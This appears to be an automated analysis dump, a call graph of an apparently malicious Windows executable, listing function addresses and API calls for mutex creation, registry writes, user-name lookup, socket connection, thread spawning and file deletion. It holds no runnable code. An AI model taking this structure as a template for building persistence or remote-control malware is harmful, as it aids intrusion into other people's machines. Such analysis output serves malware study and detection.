47317 434fcb _ValidateLocalCookies 5 API calls 47316->47317 47318 4348dc 47317->47318 47318->47285 47319 4441f5 47318->47319 47322 444224 47319->47322 47320 434fcb _ValidateLocalCookies 5 API calls 47321 44424d 47320->47321 47321->47290 47322->47320 47676 436e90 47323->47676 47326 434968 47327 4441a2 47326->47327 47678 44f059 47327->47678 47329 434971 47332 40e9c5 47329->47332 47330 4441ab 47330->47329 47682 446815 36 API calls 47330->47682 47853 41cb50 LoadLibraryA GetProcAddress 47332->47853 47334 40e9e1 GetModuleFileNameW 47858 40f3c3 47334->47858 47336 40e9fd 47873 4020f6 47336->47873 47339 4020f6 28 API calls 47340 40ea1b 47339->47340 47879 41be1b 47340->47879 47344 40ea2d 47905 401e8d 47344->47905 47346 40ea36 47347 40ea93 47346->47347 47348 40ea49 47346->47348 47911 401e65 47347->47911 48180 40fbb3 118 API calls 47348->48180 47351 40eaa3 47355 401e65 22 API calls 47351->47355 47352 40ea5b 47353 401e65 22 API calls 47352->47353 47354 40ea67 47353->47354 48181 410f37 36 API calls __EH_prolog 47354->48181 47356 40eac2 47355->47356 47916 40531e 47356->47916 47359 40ea79 48182 40fb64 78 API calls 47359->48182 47360 40ead1 47921 406383 47360->47921 47363 40ea82 48183 40f3b0 71 API calls 47363->48183 47370 401fd8 11 API calls 47372 40eefb 47370->47372 47371 401fd8 11 API calls 47373 40eafb 47371->47373 47612 4432f6 GetModuleHandleW 47372->47612 47374 401e65 22 API calls 47373->47374 47375 40eb04 47374->47375 47938 401fc0 47375->47938 47377 40eb0f 47378 401e65 22 API calls 47377->47378 47379 40eb28 47378->47379 47380 401e65 22 API calls 47379->47380 47381 40eb43 47380->47381 47382 40ebae 47381->47382 48184 406c1e 47381->48184 47383 401e65 22 API calls 47382->47383 47389 40ebbb 47383->47389 47385 40eb70 47386 401fe2 28 API calls 47385->47386 47387 40eb7c 47386->47387 47390 401fd8 11 API calls 47387->47390 47388 40ec02 47942 40d069 47388->47942 47389->47388 47395 413549 3 API calls 47389->47395 47391 40eb85 47390->47391 48189 413549 RegOpenKeyExA 47391->48189 47393 40ec08 47394 40ea8b 47393->47394 47945 41b2c3 47393->47945 47394->47370 47401 40ebe6 47395->47401 47399 40ec23 47402 40ec76 47399->47402 47962 407716 47399->47962 47400 40f34f 48267 4139a9 30 API calls 47400->48267 47401->47388 48192 4139a9 30 API calls 47401->48192 47405 401e65 22 API calls 47402->47405 47408 40ec7f 47405->47408 47407 40f365 48268 412475 65 API calls ___scrt_get_show_window_mode 47407->48268 47416 40ec90 47408->47416 47417 40ec8b 47408->47417 47411 40ec42 48193 407738 30 API calls 47411->48193 47412 40ec4c 47414 401e65 22 API calls 47412->47414 47426 40ec55 47414->47426 47415 40f36f 47419 41bc5e 28 API calls 47415->47419 47422 401e65 22 API calls 47416->47422 48196 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47417->48196 47418 40ec47 48194 407260 98 API calls 47418->48194 47423 40f37f 47419->47423 47424 40ec99 47422->47424 48072 413a23 RegOpenKeyExW 47423->48072 47966 41bc5e 47424->47966 47426->47402 47430 40ec71 47426->47430 47427 40eca4 47970 401f13 47427->47970 48195 407260 98 API calls 47430->48195 47434 401f09 11 API calls 47436 40f39c 47434->47436 47438 401f09 11 API calls 47436->47438 47440 40f3a5 47438->47440 47439 401e65 22 API calls 47442 40ecc1 47439->47442 48075 40dd42 47440->48075 47445 401e65 22 API calls 47442->47445 47447 40ecdb 47445->47447 47446 40f3af 47448 401e65 22 API calls 47447->47448 47449 40ecf5 47448->47449 47450 401e65 22 API calls 47449->47450 47451 40ed0e 47450->47451 47453 401e65 22 API calls 47451->47453 47483 40ed7b 47451->47483 47452 40ed8a 47454 40ed93 47452->47454 47458 40ee0f ___scrt_get_show_window_mode 47452->47458 47457 40ed23 _wcslen 47453->47457 47455 401e65 22 API calls 47454->47455 47456 40ed9c 47455->47456 47459 401e65 22 API calls 47456->47459 47461 401e65 22 API calls 47457->47461 47457->47483 47982 413947 47458->47982 47462 40edae 47459->47462 47460 40ef06 ___scrt_get_show_window_mode 48257 4136f8 RegOpenKeyExA 47460->48257 47464 40ed3e 47461->47464 47465 401e65 22 API calls 47462->47465 47467 401e65 22 API calls 47464->47467 47468 40edc0 47465->47468 47466 40ef51 47471 401e65 22 API calls 47466->47471 47469 40ed53 47467->47469 47470 401e65 22 API calls 47468->47470 48197 40da34 47469->48197 47472 40ede9 47470->47472 47473 40ef76 47471->47473 47477 401e65 22 API calls 47472->47477 47992 402093 47473->47992 47476 401f13 28 API calls 47479 40ed72 47476->47479 47481 40edfa 47477->47481 47480 401f09 11 API calls 47479->47480 47480->47483 48255 40cdf9 45 API calls _wcslen 47481->48255 47482 40ef88 47998 41376f RegCreateKeyA 47482->47998 47483->47452 47483->47460 47487 40eea3 ctype 47492 401e65 22 API calls 47487->47492 47488 40ee0a 47488->47458 47490 401e65 22 API calls 47491 40efaa 47490->47491 48004 43baac 47491->48004 47493 40eeba 47492->47493 47493->47466 47497 40eece 47493->47497 47496 40efc1 48260 41cd9b 87 API calls ___scrt_get_show_window_mode 47496->48260 47499 401e65 22 API calls 47497->47499 47498 40efe4 47503 402093 28 API calls 47498->47503 47501 40eed7 47499->47501 47504 41bc5e 28 API calls 47501->47504 47502 40efc8 CreateThread 47502->47498 49175 41d45d 10 API calls 47502->49175 47505 40eff9 47503->47505 47506 40eee3 47504->47506 47508 402093 28 API calls 47505->47508 48256 40f474 104 API calls 47506->48256 47509 40f008 47508->47509 48008 41b4ef 47509->48008 47510 40eee8 47510->47466 47512 40eeef 47510->47512 47512->47394 47514 401e65 22 API calls 47515 40f019 47514->47515 47516 401e65 22 API calls 47515->47516 47517 40f02b 47516->47517 47518 401e65 22 API calls 47517->47518 47519 40f04b 47518->47519 47520 43baac _strftime 40 API calls 47519->47520 47521 40f058 47520->47521 47522 401e65 22 API calls 47521->47522 47523 40f063 47522->47523 47524 401e65 22 API calls 47523->47524 47525 40f074 47524->47525 47526 401e65 22 API calls 47525->47526 47527 40f089 47526->47527 47528 401e65 22 API calls 47527->47528 47529 40f09a 47528->47529 47530 40f0a1 StrToIntA 47529->47530 48032 409de4 47530->48032 47533 401e65 22 API calls 47534 40f0bc 47533->47534 47535 40f101 47534->47535 47536 40f0c8 47534->47536 47538 401e65 22 API calls 47535->47538 48261 4344ea 22 API calls 3 library calls 47536->48261 47540 40f111 47538->47540 47539 40f0d1 47541 401e65 22 API calls 47539->47541 47543 40f159 47540->47543 47544 40f11d 47540->47544 47542 40f0e4 47541->47542 47545 40f0eb CreateThread 47542->47545 47547 401e65 22 API calls 47543->47547 48262 4344ea 22 API calls 3 library calls 47544->48262 47545->47535 49173 419fb4 103 API calls 2 library calls 47545->49173 47549 40f162 47547->47549 47548 40f126 47550 401e65 22 API calls 47548->47550 47552 40f1cc 47549->47552 47553 40f16e 47549->47553 47551 40f138 47550->47551 47556 40f13f CreateThread 47551->47556 47554 401e65 22 API calls 47552->47554 47555 401e65 22 API calls 47553->47555 47557 40f1d5 47554->47557 47558 40f17e 47555->47558 47556->47543 49172 419fb4 103 API calls 2 library calls 47556->49172 47559 40f1e1 47557->47559 47560 40f21a 47557->47560 47561 401e65 22 API calls 47558->47561 47563 401e65 22 API calls 47559->47563 48057 41b60d 47560->48057 47564 40f193 47561->47564 47566 40f1ea 47563->47566 48263 40d9e8 31 API calls 47564->48263 47571 401e65 22 API calls 47566->47571 47567 401f13 28 API calls 47568 40f22e 47567->47568 47570 401f09 11 API calls 47568->47570 47573 40f237 47570->47573 47574 40f1ff 47571->47574 47572 40f1a6 47575 401f13 28 API calls 47572->47575 47576 40f240 SetProcessDEPPolicy 47573->47576 47577 40f243 CreateThread 47573->47577 47584 43baac _strftime 40 API calls 47574->47584 47578 40f1b2 47575->47578 47576->47577 47579 40f264 47577->47579 47580 40f258 CreateThread 47577->47580 49144 40f7a7 47577->49144 47581 401f09 11 API calls 47578->47581 47582 40f279 47579->47582 47583 40f26d CreateThread 47579->47583 47580->47579 49174 4120f7 138 API calls 47580->49174 47585 40f1bb CreateThread 47581->47585 47587 40f2cc 47582->47587 47589 402093 28 API calls 47582->47589 47583->47582 49176 4126db 38 API calls ___scrt_get_show_window_mode 47583->49176 47586 40f20c 47584->47586 47585->47552 49171 401be9 50 API calls _strftime 47585->49171 48264 40c162 7 API calls 47586->48264 48069 4134ff RegOpenKeyExA 47587->48069 47590 40f29c 47589->47590 48265 4052fd 28 API calls 47590->48265 47596 40f2ed 47597 41bc5e 28 API calls 47596->47597 47599 40f2fd 47597->47599 48266 41361b 31 API calls 47599->48266 47604 40f313 47605 401f09 11 API calls 47604->47605 47608 40f31e 47605->47608 47606 40f346 DeleteFileW 47607 40f34d 47606->47607 47606->47608 47607->47415 47608->47415 47608->47606 47609 40f334 Sleep 47608->47609 47609->47608 47610->47280 47611->47287 47612->47297 47613->47298 47614->47300 47615->47303 47616->47307 47618 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47617->47618 47630 43a43a 47618->47630 47622 438f4c 47623 438f57 47622->47623 47644 43a476 DeleteCriticalSection 47622->47644 47623->47309 47625 438f44 47625->47309 47672 44fb68 47626->47672 47629 438f5a 8 API calls 3 library calls 47629->47314 47631 43a443 47630->47631 47633 43a46c 47631->47633 47634 438f40 47631->47634 47645 438e7f 47631->47645 47650 43a476 DeleteCriticalSection 47633->47650 47634->47625 47636 43a3ec 47634->47636 47665 438d94 47636->47665 47638 43a3f6 47639 43a401 47638->47639 47670 438e42 6 API calls try_get_function 47638->47670 47639->47622 47641 43a40f 47642 43a41c 47641->47642 47671 43a41f 6 API calls ___vcrt_FlsFree 47641->47671 47642->47622 47644->47625 47651 438c73 47645->47651 47648 438eb6 InitializeCriticalSectionAndSpinCount 47649 438ea2 47648->47649 47649->47631 47650->47634 47652 438ca3 47651->47652 47653 438ca7 47651->47653 47652->47653 47657 438cc7 47652->47657 47658 438d13 47652->47658 47653->47648 47653->47649 47655 438cd3 GetProcAddress 47656 438ce3 __crt_fast_encode_pointer 47655->47656 47656->47653 47657->47653 47657->47655 47659 438d30 47658->47659 47660 438d3b LoadLibraryExW 47658->47660 47659->47652 47661 438d57 GetLastError 47660->47661 47662 438d6f 47660->47662 47661->47662 47663 438d62 LoadLibraryExW 47661->47663 47662->47659 47664 438d86 FreeLibrary 47662->47664 47663->47662 47664->47659 47666 438c73 try_get_function 5 API calls 47665->47666 47667 438dae 47666->47667 47668 438dc6 TlsAlloc 47667->47668 47669 438db7 47667->47669 47669->47638 47670->47641 47671->47639 47675 44fb81 47672->47675 47673 434fcb _ValidateLocalCookies 5 API calls 47674 4345bd 47673->47674 47674->47312 47674->47629 47675->47673 47677 434b27 GetStartupInfoW 47676->47677 47677->47326 47679 44f06b 47678->47679 47680 44f062 47678->47680 47679->47330 47683 44ef58 47680->47683 47682->47330 47703 448215 GetLastError 47683->47703 47685 44ef65 47724 44f077 47685->47724 47687 44ef6d 47733 44ecec 47687->47733 47692 44efc7 47758 446782 20 API calls _free 47692->47758 47696 44ef84 47696->47679 47697 44efc2 47757 4405dd 20 API calls __dosmaperr 47697->47757 47699 44f00b 47699->47692 47760 44ebc2 20 API calls 47699->47760 47700 44efdf 47700->47699 47759 446782 20 API calls _free 47700->47759 47704 448237 47703->47704 47705 44822b 47703->47705 47762 445af3 20 API calls 3 library calls 47704->47762 47761 4487bc 11 API calls 2 library calls 47705->47761 47708 448231 47708->47704 47710 448280 SetLastError 47708->47710 47709 448243 47715 44824b 47709->47715 47764 448812 11 API calls 2 library calls 47709->47764 47710->47685 47713 448260 47713->47715 47716 448267 47713->47716 47714 448251 47718 44828c SetLastError 47714->47718 47763 446782 20 API calls _free 47715->47763 47765 448087 20 API calls __Toupper 47716->47765 47767 4460f4 36 API calls 4 library calls 47718->47767 47719 448272 47766 446782 20 API calls _free 47719->47766 47722 448298 47723 448279 47723->47710 47723->47718 47725 44f083 ___FrameUnwindToState 47724->47725 47726 448215 __Toupper 36 API calls 47725->47726 47731 44f08d 47726->47731 47728 44f111 ___FrameUnwindToState 47728->47687 47731->47728 47768 4460f4 36 API calls 4 library calls 47731->47768 47769 445888 EnterCriticalSection 47731->47769 47770 446782 20 API calls _free 47731->47770 47771 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 47731->47771 47772 43a7b7 47733->47772 47736 44ed0d GetOEMCP 47738 44ed36 47736->47738 47737 44ed1f 47737->47738 47739 44ed24 GetACP 47737->47739 47738->47696 47740 446137 47738->47740 47739->47738 47741 446175 47740->47741 47745 446145 ___crtLCMapStringA 47740->47745 47783 4405dd 20 API calls __dosmaperr 47741->47783 47742 446160 RtlAllocateHeap 47744 446173 47742->47744 47742->47745 47744->47692 47747 44f119 47744->47747 47745->47741 47745->47742 47782 442f80 7 API calls 2 library calls 47745->47782 47748 44ecec 38 API calls 47747->47748 47749 44f138 47748->47749 47752 44f189 IsValidCodePage 47749->47752 47754 44f13f 47749->47754 47756 44f1ae ___scrt_get_show_window_mode 47749->47756 47750 434fcb _ValidateLocalCookies 5 API calls 47751 44efba 47750->47751 47751->47697 47751->47700 47753 44f19b GetCPInfo 47752->47753 47752->47754 47753->47754 47753->47756 47754->47750 47784 44edc4 GetCPInfo 47756->47784 47757->47692 47758->47696 47759->47699 47760->47692 47761->47708 47762->47709 47763->47714 47764->47713 47765->47719 47766->47723 47767->47722 47768->47731 47769->47731 47770->47731 47771->47731 47773 43a7ca 47772->47773 47774 43a7d4 47772->47774 47773->47736 47773->47737 47774->47773 47775 448215 __Toupper 36 API calls 47774->47775 47776 43a7f5 47775->47776 47780 448364 36 API calls __Toupper 47776->47780 47778 43a80e 47781 448391 36 API calls __cftof 47778->47781 47780->47778 47781->47773 47782->47745 47783->47744 47790 44edfe 47784->47790 47793 44eea8 47784->47793 47787 434fcb _ValidateLocalCookies 5 API calls 47789 44ef54 47787->47789 47789->47754 47794 45112c 47790->47794 47792 44ae66 _swprintf 41 API calls 47792->47793 47793->47787 47795 43a7b7 __cftof 36 API calls 47794->47795 47796 45114c MultiByteToWideChar 47795->47796 47798 451222 47796->47798 47799 45118a 47796->47799 47800 434fcb _ValidateLocalCookies 5 API calls 47798->47800 47802 446137 ___crtLCMapStringA 21 API calls 47799->47802 47804 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 47799->47804 47803 44ee5f 47800->47803 47801 45121c 47813 435e40 20 API calls _free 47801->47813 47802->47804 47808 44ae66 47803->47808 47804->47801 47806 4511f0 MultiByteToWideChar 47804->47806 47806->47801 47807 45120c GetStringTypeW 47806->47807 47807->47801 47809 43a7b7 __cftof 36 API calls 47808->47809 47810 44ae79 47809->47810 47814 44ac49 47810->47814 47813->47798 47815 44ac64 ___crtLCMapStringA 47814->47815 47816 44ac8a MultiByteToWideChar 47815->47816 47817 44acb4 47816->47817 47818 44ae3e 47816->47818 47821 446137 ___crtLCMapStringA 21 API calls 47817->47821 47824 44acd5 __alloca_probe_16 47817->47824 47819 434fcb _ValidateLocalCookies 5 API calls 47818->47819 47820 44ae51 47819->47820 47820->47792 47821->47824 47822 44ad8a 47850 435e40 20 API calls _free 47822->47850 47823 44ad1e MultiByteToWideChar 47823->47822 47825 44ad37 47823->47825 47824->47822 47824->47823 47841 448bb3 47825->47841 47829 44ad61 47829->47822 47833 448bb3 _strftime 11 API calls 47829->47833 47830 44ad99 47831 446137 ___crtLCMapStringA 21 API calls 47830->47831 47835 44adba __alloca_probe_16 47830->47835 47831->47835 47832 44ae2f 47849 435e40 20 API calls _free 47832->47849 47833->47822 47835->47832 47836 448bb3 _strftime 11 API calls 47835->47836 47837 44ae0e 47836->47837 47837->47832 47838 44ae1d WideCharToMultiByte 47837->47838 47838->47832 47839 44ae5d 47838->47839 47851 435e40 20 API calls _free 47839->47851 47842 4484ca __Toupper 5 API calls 47841->47842 47843 448bda 47842->47843 47846 448be3 47843->47846 47852 448c3b 10 API calls 3 library calls 47843->47852 47845 448c23 LCMapStringW 47845->47846 47847 434fcb _ValidateLocalCookies 5 API calls 47846->47847 47848 448c35 47847->47848 47848->47822 47848->47829 47848->47830 47849->47822 47850->47818 47851->47822 47852->47845 47854 41cb8f LoadLibraryA GetProcAddress 47853->47854 47855 41cb7f GetModuleHandleA GetProcAddress 47853->47855 47856 41cbb8 44 API calls 47854->47856 47857 41cba8 LoadLibraryA GetProcAddress 47854->47857 47855->47854 47856->47334 47857->47856 48269 41b4a8 FindResourceA 47858->48269 47862 40f3ed _Yarn 48279 4020b7 47862->48279 47865 401fe2 28 API calls 47866 40f413 47865->47866 47867 401fd8 11 API calls 47866->47867 47868 40f41c 47867->47868 47869 43bd51 _Yarn 21 API calls 47868->47869 47870 40f42d _Yarn 47869->47870 48285 406dd8 47870->48285 47872 40f460 47872->47336 47874 40210c 47873->47874 47875 4023ce 11 API calls 47874->47875 47876 402126 47875->47876 47877 402569 28 API calls 47876->47877 47878 402134 47877->47878 47878->47339 48322 4020df 47879->48322 47881 401fd8 11 API calls 47882 41bed0 47881->47882 47883 401fd8 11 API calls 47882->47883 47885 41bed8 47883->47885 47884 41bea0 47886 4041a2 28 API calls 47884->47886 47888 401fd8 11 API calls 47885->47888 47889 41beac 47886->47889 47892 40ea24 47888->47892 47893 401fe2 28 API calls 47889->47893 47890 41be2e 47890->47884 47891 401fe2 28 API calls 47890->47891 47896 401fd8 11 API calls 47890->47896 47900 41be9e 47890->47900 48326 4041a2 47890->48326 48329 41ce34 28 API calls 47890->48329 47891->47890 47901 40fb17 47892->47901 47894 41beb5 47893->47894 47895 401fd8 11 API calls 47894->47895 47897 41bebd 47895->47897 47896->47890 48330 41ce34 28 API calls 47897->48330 47900->47881 47902 40fb23 47901->47902 47904 40fb2a 47901->47904 48337 402163 11 API calls 47902->48337 47904->47344 47906 402163 47905->47906 47907 40219f 47906->47907 48338 402730 11 API calls 47906->48338 47907->47346 47909 402184 48339 402712 11 API calls std::_Deallocate 47909->48339 47913 401e6d 47911->47913 47912 401e75 47912->47351 47913->47912 48340 402158 22 API calls 47913->48340 47917 4020df 11 API calls 47916->47917 47918 40532a 47917->47918 48341 4032a0 47918->48341 47920 405346 47920->47360 48346 4051ef 47921->48346 47923 406391 48350 402055 47923->48350 47926 401fe2 47927 401ff1 47926->47927 47928 402039 47926->47928 47929 4023ce 11 API calls 47927->47929 47935 401fd8 47928->47935 47930 401ffa 47929->47930 47931 40203c 47930->47931 47932 402015 47930->47932 47933 40267a 11 API calls 47931->47933 48384 403098 28 API calls 47932->48384 47933->47928 47936 4023ce 11 API calls 47935->47936 47937 401fe1 47936->47937 47937->47371 47939 401fd2 47938->47939 47940 401fc9 47938->47940 47939->47377 48385 4025e0 28 API calls 47940->48385 48386 401fab 47942->48386 47944 40d073 CreateMutexA GetLastError 47944->47393 48387 41bfb7 47945->48387 47950 401fe2 28 API calls 47951 41b2ff 47950->47951 47952 401fd8 11 API calls 47951->47952 47953 41b307 47952->47953 47954 4135a6 31 API calls 47953->47954 47956 41b35d 47953->47956 47955 41b330 47954->47955 47957 41b33b StrToIntA 47955->47957 47956->47399 47958 41b349 47957->47958 47961 41b352 47957->47961 48395 41cf69 22 API calls 47958->48395 47960 401fd8 11 API calls 47960->47956 47961->47960 47963 40772a 47962->47963 47964 413549 3 API calls 47963->47964 47965 407731 47964->47965 47965->47411 47965->47412 47967 41bc72 47966->47967 48396 40b904 47967->48396 47969 41bc7a 47969->47427 47971 401f22 47970->47971 47978 401f6a 47970->47978 47972 402252 11 API calls 47971->47972 47973 401f2b 47972->47973 47974 401f6d 47973->47974 47976 401f46 47973->47976 48429 402336 47974->48429 48428 40305c 28 API calls 47976->48428 47979 401f09 47978->47979 47980 402252 11 API calls 47979->47980 47981 401f12 47980->47981 47981->47439 47983 413965 47982->47983 47984 406dd8 28 API calls 47983->47984 47985 41397a 47984->47985 47986 4020f6 28 API calls 47985->47986 47987 41398a 47986->47987 47988 41376f 14 API calls 47987->47988 47989 413994 47988->47989 47990 401fd8 11 API calls 47989->47990 47991 4139a1 47990->47991 47991->47487 47993 40209b 47992->47993 47994 4023ce 11 API calls 47993->47994 47995 4020a6 47994->47995 48433 4024ed 47995->48433 47999 4137bf 47998->47999 48000 413788 47998->48000 48001 401fd8 11 API calls 47999->48001 48003 41379a RegSetValueExA RegCloseKey 48000->48003 48002 40ef9e 48001->48002 48002->47490 48003->47999 48005 43bac5 _strftime 48004->48005 48437 43ae03 48005->48437 48007 40efb7 48007->47496 48007->47498 48009 41b5a0 48008->48009 48010 41b505 GetLocalTime 48008->48010 48012 401fd8 11 API calls 48009->48012 48011 40531e 28 API calls 48010->48011 48014 41b547 48011->48014 48013 41b5a8 48012->48013 48015 401fd8 11 API calls 48013->48015 48016 406383 28 API calls 48014->48016 48017 40f00d 48015->48017 48018 41b553 48016->48018 48017->47514 48464 402f10 48018->48464 48021 406383 28 API calls 48022 41b56b 48021->48022 48469 407200 77 API calls 48022->48469 48024 41b579 48025 401fd8 11 API calls 48024->48025 48026 41b585 48025->48026 48027 401fd8 11 API calls 48026->48027 48028 41b58e 48027->48028 48029 401fd8 11 API calls 48028->48029 48030 41b597 48029->48030 48031 401fd8 11 API calls 48030->48031 48031->48009 48033 409e02 _wcslen 48032->48033 48034 409e24 48033->48034 48035 409e0d 48033->48035 48037 40da34 31 API calls 48034->48037 48036 40da34 31 API calls 48035->48036 48038 409e15 48036->48038 48039 409e2c 48037->48039 48040 401f13 28 API calls 48038->48040 48041 401f13 28 API calls 48039->48041 48042 409e1f 48040->48042 48043 409e3a 48041->48043 48045 401f09 11 API calls 48042->48045 48044 401f09 11 API calls 48043->48044 48046 409e42 48044->48046 48047 409e79 48045->48047 48488 40915b 28 API calls 48046->48488 48473 40a109 48047->48473 48049 409e54 48489 403014 48049->48489 48054 401f13 28 API calls 48055 409e69 48054->48055 48056 401f09 11 API calls 48055->48056 48056->48042 48058 41b630 GetUserNameW 48057->48058 48693 40417e 48058->48693 48063 403014 28 API calls 48064 41b672 48063->48064 48065 401f09 11 API calls 48064->48065 48066 41b67b 48065->48066 48067 401f09 11 API calls 48066->48067 48068 40f223 48067->48068 48068->47567 48070 413520 RegQueryValueExA RegCloseKey 48069->48070 48071 40f2e4 48069->48071 48070->48071 48071->47440 48071->47596 48073 40f392 48072->48073 48074 413a3f RegDeleteValueW 48072->48074 48073->47434 48074->48073 48076 40dd5b 48075->48076 48077 4134ff 3 API calls 48076->48077 48078 40dd62 48077->48078 48082 40dd81 48078->48082 48787 401707 48078->48787 48080 40dd6f 48790 413877 RegCreateKeyA 48080->48790 48083 414f2a 48082->48083 48084 4020df 11 API calls 48083->48084 48085 414f3e 48084->48085 48810 41b8b3 48085->48810 48088 4020df 11 API calls 48089 414f54 48088->48089 48090 401e65 22 API calls 48089->48090 48091 414f62 48090->48091 48092 43baac _strftime 40 API calls 48091->48092 48093 414f6f 48092->48093 48094 414f81 48093->48094 48095 414f74 Sleep 48093->48095 48096 402093 28 API calls 48094->48096 48095->48094 48097 414f90 48096->48097 48098 401e65 22 API calls 48097->48098 48099 414f99 48098->48099 48100 4020f6 28 API calls 48099->48100 48101 414fa4 48100->48101 48102 41be1b 28 API calls 48101->48102 48103 414fac 48102->48103 48814 40489e WSAStartup 48103->48814 48105 414fb6 48106 401e65 22 API calls 48105->48106 48107 414fbf 48106->48107 48108 401e65 22 API calls 48107->48108 48157 41503e 48107->48157 48109 414fd8 48108->48109 48111 401e65 22 API calls 48109->48111 48110 4020f6 28 API calls 48110->48157 48112 414fe9 48111->48112 48114 401e65 22 API calls 48112->48114 48113 41be1b 28 API calls 48113->48157 48115 414ffa 48114->48115 48116 401e65 22 API calls 48115->48116 48118 41500b 48116->48118 48117 406c1e 28 API calls 48117->48157 48120 401e65 22 API calls 48118->48120 48119 401fe2 28 API calls 48119->48157 48121 41501c 48120->48121 48122 401e65 22 API calls 48121->48122 48123 41502e 48122->48123 48949 40473d 89 API calls 48123->48949 48125 401fd8 11 API calls 48125->48157 48126 401e65 22 API calls 48126->48157 48128 41518c WSAGetLastError 48950 41cae1 30 API calls 48128->48950 48132 402093 28 API calls 48134 41519c 48132->48134 48134->48132 48136 41b4ef 80 API calls 48134->48136 48139 401e8d 11 API calls 48134->48139 48140 401e65 22 API calls 48134->48140 48141 43baac _strftime 40 API calls 48134->48141 48134->48157 48177 415a71 CreateThread 48134->48177 48178 401fd8 11 API calls 48134->48178 48179 401f09 11 API calls 48134->48179 48951 4052fd 28 API calls 48134->48951 48953 40b051 85 API calls 48134->48953 48954 404e26 99 API calls 48134->48954 48136->48134 48138 40531e 28 API calls 48138->48157 48139->48134 48140->48134 48142 415acf Sleep 48141->48142 48142->48134 48143 406383 28 API calls 48143->48157 48144 402f10 28 API calls 48144->48157 48145 402093 28 API calls 48145->48157 48146 41b4ef 80 API calls 48146->48157 48149 40905c 28 API calls 48149->48157 48150 441e81 20 API calls 48150->48157 48151 4136f8 3 API calls 48151->48157 48152 4135a6 31 API calls 48152->48157 48153 40417e 28 API calls 48153->48157 48157->48110 48157->48113 48157->48117 48157->48119 48157->48125 48157->48126 48157->48128 48157->48134 48157->48138 48157->48143 48157->48144 48157->48145 48157->48146 48157->48149 48157->48150 48157->48151 48157->48152 48157->48153 48158 41bb8e 28 API calls 48157->48158 48159 401e65 22 API calls 48157->48159 48815 414ee9 48157->48815 48820 40482d 48157->48820 48827 404f51 48157->48827 48842 4048c8 connect 48157->48842 48902 41b7e0 48157->48902 48905 4145bd 48157->48905 48908 40dd89 48157->48908 48914 41bc42 48157->48914 48917 41bd1e 48157->48917 48158->48157 48160 415439 GetTickCount 48159->48160 48161 41bb8e 28 API calls 48160->48161 48174 415456 48161->48174 48163 41bb8e 28 API calls 48163->48174 48166 41bd1e 28 API calls 48166->48174 48168 406383 28 API calls 48168->48174 48169 402ea1 28 API calls 48169->48174 48170 402f10 28 API calls 48170->48174 48172 401fd8 11 API calls 48172->48174 48173 401f09 11 API calls 48173->48174 48174->48163 48174->48166 48174->48168 48174->48169 48174->48170 48174->48172 48174->48173 48921 41bae6 48174->48921 48923 41ba96 48174->48923 48928 40f8d1 29 API calls 48174->48928 48929 402f31 28 API calls 48174->48929 48930 404c10 48174->48930 48952 404aa1 61 API calls _Yarn 48174->48952 48177->48134 49137 41ad17 105 API calls 48177->49137 48178->48134 48179->48134 48180->47352 48181->47359 48182->47363 48185 4020df 11 API calls 48184->48185 48186 406c2a 48185->48186 48187 4032a0 28 API calls 48186->48187 48188 406c47 48187->48188 48188->47385 48190 413573 RegQueryValueExA RegCloseKey 48189->48190 48191 40eba4 48189->48191 48190->48191 48191->47382 48191->47400 48192->47388 48193->47418 48194->47412 48195->47402 48196->47416 48198 401f86 11 API calls 48197->48198 48199 40da50 48198->48199 48200 40da70 48199->48200 48201 40daa5 48199->48201 48216 40da66 48199->48216 49138 41b5b4 29 API calls 48200->49138 48203 41bfb7 GetCurrentProcess 48201->48203 48202 40db99 GetLongPathNameW 48205 40417e 28 API calls 48202->48205 48206 40daaa 48203->48206 48208 40dbae 48205->48208 48209 40db00 48206->48209 48210 40daae 48206->48210 48207 40da79 48211 401f13 28 API calls 48207->48211 48212 40417e 28 API calls 48208->48212 48213 40417e 28 API calls 48209->48213 48214 40417e 28 API calls 48210->48214 48215 40da83 48211->48215 48217 40dbbd 48212->48217 48218 40db0e 48213->48218 48219 40dabc 48214->48219 48220 401f09 11 API calls 48215->48220 48216->48202 49141 40ddd1 28 API calls 48217->49141 48224 40417e 28 API calls 48218->48224 48225 40417e 28 API calls 48219->48225 48220->48216 48222 40dbd0 49142 402fa5 28 API calls 48222->49142 48227 40db24 48224->48227 48228 40dad2 48225->48228 48226 40dbdb 49143 402fa5 28 API calls 48226->49143 49140 402fa5 28 API calls 48227->49140 49139 402fa5 28 API calls 48228->49139 48232 40dbe5 48236 401f09 11 API calls 48232->48236 48233 40db2f 48237 401f13 28 API calls 48233->48237 48234 40dadd 48235 401f13 28 API calls 48234->48235 48239 40dae8 48235->48239 48240 40dbef 48236->48240 48238 40db3a 48237->48238 48241 401f09 11 API calls 48238->48241 48242 401f09 11 API calls 48239->48242 48243 401f09 11 API calls 48240->48243 48245 40db43 48241->48245 48246 40daf1 48242->48246 48244 40dbf8 48243->48244 48247 401f09 11 API calls 48244->48247 48248 401f09 11 API calls 48245->48248 48249 401f09 11 API calls 48246->48249 48250 40dc01 48247->48250 48248->48215 48249->48215 48251 401f09 11 API calls 48250->48251 48252 40dc0a 48251->48252 48253 401f09 11 API calls 48252->48253 48254 40dc13 48253->48254 48254->47476 48255->47488 48256->47510 48258 41371e RegQueryValueExA RegCloseKey 48257->48258 48259 413742 48257->48259 48258->48259 48259->47466 48260->47502 48261->47539 48262->47548 48263->47572 48264->47560 48266->47604 48267->47407 48270 41b4c5 LoadResource LockResource SizeofResource 48269->48270 48271 40f3de 48269->48271 48270->48271 48272 43bd51 48271->48272 48277 446137 ___crtLCMapStringA 48272->48277 48273 446175 48289 4405dd 20 API calls __dosmaperr 48273->48289 48274 446160 RtlAllocateHeap 48276 446173 48274->48276 48274->48277 48276->47862 48277->48273 48277->48274 48288 442f80 7 API calls 2 library calls 48277->48288 48280 4020bf 48279->48280 48290 4023ce 48280->48290 48282 4020ca 48294 40250a 48282->48294 48284 4020d9 48284->47865 48286 4020b7 28 API calls 48285->48286 48287 406dec 48286->48287 48287->47872 48288->48277 48289->48276 48291 4023d8 48290->48291 48292 402428 48290->48292 48291->48292 48301 4027a7 11 API calls std::_Deallocate 48291->48301 48292->48282 48295 40251a 48294->48295 48296 402520 48295->48296 48297 402535 48295->48297 48302 402569 48296->48302 48312 4028e8 28 API calls 48297->48312 48300 402533 48300->48284 48301->48292 48313 402888 48302->48313 48304 40257d 48305 402592 